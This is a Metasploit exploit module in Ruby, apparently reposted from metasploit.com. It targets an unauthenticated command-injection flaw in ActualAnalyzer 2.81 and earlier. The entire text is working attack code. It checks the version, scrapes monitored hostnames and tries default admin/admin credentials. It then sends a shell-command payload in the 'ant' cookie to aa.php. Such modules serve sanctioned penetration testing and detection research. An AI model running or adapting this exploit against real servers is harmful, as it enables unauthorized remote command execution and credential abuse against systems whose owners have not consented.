ActualAnalyzer Cookie Command Execution Vulnerability
来源:metasploit.com 作者:Coles 发布时间:2014-12-16  
##
# This module requires Metasploit: http://metasploit.com/download
##
  
require 'msf/core'
  
#
# Exploit module for the ActualAnalyzer <= 2.81 'ant' cookie issue: per the
# module description, aa.php lets an unauthenticated request run a command
# carried in the 'ant' cookie, so the payload is a plain unix command string
# (ARCH_CMD). Flow: #check the install and version, collect candidate
# "monitored" hosts (aa.php only proceeds for a host it tracks), then send the
# payload once per candidate until one is accepted.
#
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  #
  # Module metadata, payload constraints and datastore options.
  #
  # The payload travels inside an HTTP cookie, which is why 'Space' is capped
  # at 4096 bytes, NOPs are disabled and "\x00" is the only bad character.
  #
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => "ActualAnalyzer 'ant' Cookie Command Execution",
      'Description'     => %q{
        This module exploits a command execution vulnerability in
        ActualAnalyzer version 2.81 and prior.
  
        The 'aa.php' file allows unauthenticated users to
        execute arbitrary commands in the 'ant' cookie.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Benjamin Harris', # Discovery and exploit
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'      =>
        [
          ['EDB', '34450'],
          ['OSVDB', '110601']
        ],
      'Payload'         =>
        {
          'Space'       => 4096, # HTTP cookie
          'DisableNops' => true,
          'BadChars'    => "\x00"
        },
      'Arch'            => ARCH_CMD,
      'Platform'        => 'unix',
      'Targets'         =>
        [
          # Tested on ActualAnalyzer versions 2.81 and 2.75 on Ubuntu
          ['ActualAnalyzer <= 2.81', { 'auto' => true }]
        ],
      'Privileged'      => false,
      'DisclosureDate'  => 'Aug 28 2014',
      'DefaultTarget'   => 0))
  
    # TARGETURI is the web path of the ActualAnalyzer install. USERNAME and
    # PASSWORD are only used by get_analytics_host_admin. ANALYZER_HOST, when
    # set, replaces host discovery entirely (see #exploit).
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
        OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
        OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
        OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
      ], self.class)
  end
  
  #
  # Checks if target is running ActualAnalyzer <= 2.81
  #
  # Returns Exploit::CheckCode::Unknown when a request gets no response,
  # Safe when aa.php is missing (or nothing below matched), Detected when the
  # product is present but not yet installed or its version could not be tied
  # to the vulnerable range, and Vulnerable when view.php reports a version
  # <= 2.81 (also recorded in the database via report_vuln).
  #
  def check
    # check for aa.php
    res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php'))
    if !res
      vprint_error("#{peer} - Connection failed")
      return Exploit::CheckCode::Unknown
    elsif res.code == 404
      vprint_error("#{peer} - Could not find aa.php")
      return Exploit::CheckCode::Safe
    elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/
      # An "Admin area" page from aa.php is treated as "product present but
      # its web installer has not been run yet".
      vprint_error("#{peer} - ActualAnalyzer is not installed. Try installing first.")
      return Exploit::CheckCode::Detected
    end
    # check version
    res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php'))
    if !res
      vprint_error("#{peer} - Connection failed")
      return Exploit::CheckCode::Unknown
    elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body
      # Regex literal on the left of =~, so the named capture binds the local
      # 'version'.
      vprint_status("#{peer} - Found version: #{version}")
      # Gem::Version compares segment-wise rather than as strings/floats.
      if Gem::Version.new(version) <= Gem::Version.new('2.81')
        report_vuln(
          host: rhost,
          name: self.name,
          info: "Module #{fullname} detected ActualAnalyzer #{version}",
          refs: references,
        )
        return Exploit::CheckCode::Vulnerable
      end
      return Exploit::CheckCode::Detected
    elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/
      # Product banner seen but no parsable version string.
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end
  
  #
  # Try to retrieve a valid analytics host from view.php unauthenticated
  #
  # Posts the report form served by view.php and scrapes the first
  # "Page: http(s)://<host>" <option> from the response.
  #
  # @return [String, nil] the host, or nil when the request failed or nothing
  #   matched
  #
  def get_analytics_host_view
    analytics_host = nil
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'view.php'),
      # Report form fields; presumably mirrors what the page's own form
      # submits for a "visitors by page" report — not verified here.
      'vars_post' => {
        'id_h' => '',
        'listp' => '',
        'act_h' => 'vis_int',
        'oldact' => 'vis_grpg',
        'tint_h' => '',
        'extact_h' => '',
        'home_pos' => '',
        'act' => 'vis_grpg',
        'tint' => 'total',
        'grpg' => '201',
        'cp_vst' => 'on',
        'cp_hst' => 'on',
        'cp_htst' => 'on',
        'cp_reps' => 'y',
        'tab_sort' => '1_1'
      }
    )
    if !res
      vprint_error("#{peer} - Connection failed")
    # Named capture binds 'analytics_host'. Note the class [^\/^<] stops at
    # '/', '<' and a literal '^' (the second '^' is not a negation).
    elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body
      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
      return analytics_host
    else
      vprint_status("#{peer} - Could not find any hosts on view.php")
    end
    nil
  end
  
  #
  # Try to retrieve a valid analytics host from code.php unauthenticated
  #
  # Requests the tracking snippet for pid=1 and reads the host out of the
  # snippet's <img src='http(s)://<host>...'>.
  #
  # @return [String, nil] the host, or nil when the request failed or nothing
  #   matched
  #
  def get_analytics_host_code
    analytics_host = nil
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'code.php'),
      'vars_get' => {
        'pid' => '1'
      }
    )
    if !res
      vprint_error("#{peer} - Connection failed")
    # Named capture binds 'analytics_host'; as in the view.php regex, the
    # '^' inside the class is a literal character.
    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
      return analytics_host
    else
      vprint_status("#{peer} - Could not find any hosts on code.php")
    end
    nil
  end
  
  #
  # Try to retrieve a valid analytics host from admin.php with creds
  #
  # Logs in with USERNAME/PASSWORD and scrapes the host from the admin page's
  # <img src='http(s)://<host>...'>. A successful login is also stored in the
  # database as a validated credential.
  #
  # @return [String, nil] the host, or nil when the request failed, the login
  #   was rejected or nothing matched
  #
  def get_analytics_host_admin
    analytics_host = nil
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin.php'),
      'vars_post' => {
        'uname' => user,
        'passw' => pass,
        'id_h' => '',
        'listp' => '',
        'act_h' => '',
        'oldact' => 'pages',
        'tint_h' => '',
        'extact_h' => '',
        'param_h' => '',
        'param2_h' => '',
        'home_pos' => '',
        'act' => 'dynhtml',
        'set.x' => '11',
        'set.y' => '11'
      }
    )
    if !res
      vprint_error("#{peer} - Connection failed")
    elsif res.code == 200 && res.body =~ />Login</
      # The page still shows the Login button, so the credentials were rejected.
      vprint_status("#{peer} - Login failed.")
    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
      print_good("#{peer} - Login successful! (#{user}:#{pass})")
      # Record the working credential against this HTTP(S) service.
      service_data = {
        address: Rex::Socket.getaddress(rhost, true),
        port: rport,
        service_name: (ssl ? 'https' : 'http'),
        protocol: 'tcp',
        workspace_id: myworkspace_id
      }
      credential_data = {
        origin_type: :service,
        module_fullname: fullname,
        private_type: :password,
        private_data: pass,
        username: user
      }
      credential_data.merge!(service_data)
      credential_core = create_credential(credential_data)
      login_data = {
        core: credential_core,
        last_attempted_at: DateTime.now,
        status: Metasploit::Model::Login::Status::SUCCESSFUL
      }
      login_data.merge!(service_data)
      create_credential_login(login_data)
      return analytics_host
    else
      vprint_status("#{peer} - Could not find any hosts on admin.php")
    end
    nil
  end
  
  #
  # Sends +cmd+ to aa.php inside the 'ant' cookie, with the host to "track"
  # passed as the 'anp' query parameter.
  #
  # @param cmd [String] the command string (the encoded payload)
  # @param opts [Hash] :analytics_host - a hostname/IP that ActualAnalyzer
  #   monitors; the default hash is evaluated per call, so it reads vhost at
  #   call time
  # @return [true, nil] true when aa.php answered with a 302 to an image
  #   (taken as "payload accepted"), nil when the host is not monitored; any
  #   other outcome aborts the module via fail_with
  #
  # Detection note: the request is a plain GET to aa.php?anp=<host> whose
  # 'ant' cookie carries the command, so that cookie value is what stands out
  # in access logs or a WAF.
  #
  def execute_command(cmd, opts = { analytics_host: vhost })
    # A second cookie, randomly named anw or anm, carries a backtick
    # expression alongside the payload; presumably needed to reach the
    # vulnerable path in aa.php — confirm against the advisory (EDB 34450).
    vuln_cookies = %w(anw anm)
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'aa.php'),
      'vars_get' => { 'anp' => opts[:analytics_host] },
      'cookie' => "ant=#{cmd}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
    )
    if !res
      fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out")
    elsif res.code == 302 && res.headers['Content-Type'] =~ /image/
      # A redirect with an image content type appears to be aa.php's normal
      # answer for a monitored host.
      print_good("#{peer} - Payload sent successfully")
      return true
    elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/
      # Unmonitored host: let the caller try the next candidate.
      vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.")
    elsif res.code == 200 && res.body =~ /Admin area<\/title>/
      fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.")
    else
      fail_with(Failure::Unknown, "#{peer} - Something went wrong")
    end
    nil
  end
  
  #
  # Entry point. Bails unless #check reports Vulnerable, then tries the
  # payload once per distinct, non-nil candidate host until execute_command
  # returns true. With ANALYZER_HOST blank the candidates are the discovered
  # hosts (code.php, view.php, admin.php) followed by vhost, 127.0.0.1 and
  # localhost; otherwise only ANALYZER_HOST is tried.
  #
  def exploit
    return unless check == Exploit::CheckCode::Vulnerable
    analytics_hosts = []
    if datastore['ANALYZER_HOST'].blank?
      analytics_hosts << get_analytics_host_code
      analytics_hosts << get_analytics_host_view
      analytics_hosts << get_analytics_host_admin
      analytics_hosts << vhost
      analytics_hosts << '127.0.0.1'
      analytics_hosts << 'localhost'
    else
      analytics_hosts << datastore['ANALYZER_HOST']
    end
    # uniq removes duplicates (including repeated nils); nils from failed
    # discovery are skipped.
    analytics_hosts.uniq.each do |host|
      next if host.nil?
      vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")
      break if execute_command(payload.encoded, analytics_host: host)
    end
  end
end
  

 